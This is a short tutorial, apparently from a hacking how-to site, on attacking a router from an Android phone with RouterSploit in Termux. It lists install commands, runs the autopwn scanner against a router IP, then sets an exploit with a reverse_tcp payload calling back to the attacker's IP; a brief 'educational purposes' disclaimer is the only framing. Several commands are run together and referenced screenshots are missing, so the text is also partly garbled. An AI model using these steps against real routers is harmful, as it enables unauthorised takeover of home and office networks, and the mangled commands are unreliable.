Hack a router from an android phone
Disclaimer: Everything on this site is for educational purposes and should not be used for evil.
You will need:
TermuxRouter IP
Your IP
Run the following commands:
pip install futureapt install git figlet
git clone https://github.com/41Team/RoutersploitTermux
cd RoutersploitTermux
bash run.sh
Now wait for it to finish and you will get this message when it does:
So lets execute it!
cd ..cd routersploit
python rsf.py
You will get this screen:
Now, lets test the router:
use scanners/autopwnsettarget [Router IP]
If your router isn't vulnerable you will get this message:
If it is, you will get this message:
To use the exploit type:
use [path to exploit as shown in result]
set target [Router IP]
set payload reverse_tcp
set lhost [Your IP]
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